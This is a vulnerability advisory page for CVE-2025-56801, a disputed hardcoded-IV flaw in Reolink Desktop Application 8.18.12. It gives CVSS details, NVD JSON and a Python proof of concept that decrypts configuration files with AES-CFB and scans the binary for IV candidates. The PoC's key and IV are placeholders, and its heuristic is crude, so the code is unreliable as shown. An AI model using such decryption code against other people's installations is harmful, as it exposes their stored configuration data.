CVE-2025-56801

Description

The Reolink Desktop Application 8.18.12 contains hardcoded credentials as the Initialization Vector (IV) in its AES-CFB encryption implementation allowing attackers with access to the application environment to reliably decrypt encrypted configuration data. NOTE: the Supplier's position is that material is not hardcoded and is instead randomly generated on each installation of the application.

CVSS Details

CVSS Score

5.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:reolink:reolink:8.18.12:*:*:*:desktop:*:*:* - VULNERABLE

Reolink Desktop Application 8.18.12

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-56801 PoC - Reolink Desktop Application AES-CFB Hardcoded IV
# This PoC demonstrates how to decrypt configuration data using the hardcoded IV

from Crypto.Cipher import AES
import os
import json

def decrypt_reolink_config(encrypted_file_path, output_path):
    """
    Decrypt Reolink Desktop Application configuration file
    using the hardcoded IV discovered in version 8.18.12
    """
    # The hardcoded IV extracted from the Reolink Desktop Application binary
    # This value is embedded in the application's encryption module
    HARDCODED_IV = b'\x00' * 16  # Placeholder - actual IV extracted from binary
    
    # Key derivation or extraction would be needed
    # In practice, the key may also be derivable from the application
    key = b'\x00' * 32  # AES-256 key placeholder
    
    try:
        with open(encrypted_file_path, 'rb') as f:
            encrypted_data = f.read()
        
        # Create AES-CFB cipher with hardcoded IV
        cipher = AES.new(key, AES.MODE_CFB, iv=HARDCODED_IV, segment_size=128)
        
        # Decrypt the configuration data
        decrypted_data = cipher.decrypt(encrypted_data)
        
        # Save decrypted configuration
        with open(output_path, 'wb') as f:
            f.write(decrypted_data)
        
        print(f"[+] Configuration successfully decrypted to {output_path}")
        return decrypted_data
    
    except Exception as e:
        print(f"[-] Decryption failed: {e}")
        return None

def extract_iv_from_binary(binary_path):
    """
    Extract the hardcoded IV from the Reolink application binary
    by searching for AES initialization patterns
    """
    iv_patterns = []
    try:
        with open(binary_path, 'rb') as f:
            data = f.read()
        
        # Search for potential 16-byte IV candidates
        # AES block size is 16 bytes
        for i in range(len(data) - 16):
            candidate = data[i:i+16]
            # Check if it looks like a potential IV (heuristic)
            if all(b != 0 for b in candidate) and len(set(candidate)) > 4:
                iv_patterns.append(candidate.hex())
        
        print(f"[+] Found {len(iv_patterns)} potential IV candidates")
        return iv_patterns[:10]  # Return top candidates
    
    except Exception as e:
        print(f"[-] Binary analysis failed: {e}")
        return []

if __name__ == "__main__":
    # Example usage
    print("CVE-2025-56801 PoC - Reolink Desktop Application")
    print("=" * 50)
    
    # Step 1: Extract IV from application binary
    # binary_path = "/path/to/Reolink.exe"
    # iv_candidates = extract_iv_from_binary(binary_path)
    
    # Step 2: Decrypt configuration
    # decrypt_reolink_config("config.enc", "config_decrypted.json")
    
    print("[*] See https://github.com/shinyColumn/CVE-2025-56801 for full details")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-56801
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-56801
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-56801/
[4] VulDB https://vuldb.com/cve/CVE-2025-56801
[5] https://github.com/shinyColumn/CVE-2025-56801
[6] https://shinycolumn.notion.site/reolink-aes-iv

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-56801", "sourceIdentifier": "[email protected]", "published": "2025-10-21T19:21:22.897", "lastModified": "2025-11-17T12:46:15.277", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "The Reolink Desktop Application 8.18.12 contains hardcoded credentials as the Initialization Vector (IV) in its AES-CFB encryption implementation allowing attackers with access to the application environment to reliably decrypt encrypted configuration data. NOTE: the Supplier's position is that material is not hardcoded and is instead randomly generated on each installation of the application."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.5, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-321"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:reolink:reolink:8.18.12:*:*:*:desktop:*:*:*", "matchCriteriaId": "30EFCAEB-546D-449F-A08D-360DFF9CE745"}]}]}], "references": [{"url": "https://github.com/shinyColumn/CVE-2025-56801", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://shinycolumn.notion.site/reolink-aes-iv", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}